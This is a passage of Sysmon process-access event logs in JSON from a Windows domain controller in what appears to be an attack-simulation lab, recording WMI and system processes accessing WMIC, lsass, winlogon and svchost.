C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.049","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001051470800}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5269,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.065\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001051470800}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.065","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001051470800}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5270,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001051470800}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001051470800}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5271,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.065\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001051470800}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.065","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001051470800}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5272,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00105E4A0000}\r\nTargetProcessId: 804\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00105E4A0000}","TargetProcessId":"804","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5273,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5274,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5275,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
